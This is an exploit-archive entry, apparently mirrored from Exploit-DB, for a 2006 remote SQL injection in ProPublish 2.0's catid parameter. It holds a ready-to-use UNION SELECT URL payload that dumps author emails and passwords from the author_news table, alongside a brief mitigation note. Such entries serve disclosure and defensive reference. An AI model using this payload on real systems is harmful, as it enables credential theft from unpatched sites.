header-logo
Suggest Exploit
vendor:
ProPublish
by:
FarhadKey
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ProPublish
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: NO
Related CWE: N/A
CPE: a:propublish:propublish:2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ProPublish 2.0 (catid) Remote SQL Injection Vulnerability

A remote SQL injection vulnerability exists in ProPublish 2.0. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information such as usernames and passwords stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
# Exploited by FarhadKey from kapda.ir

Exploit :
http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE

# milw0rm.com [2006-06-03]

Navigation

Suggest Exploit

Services By CQR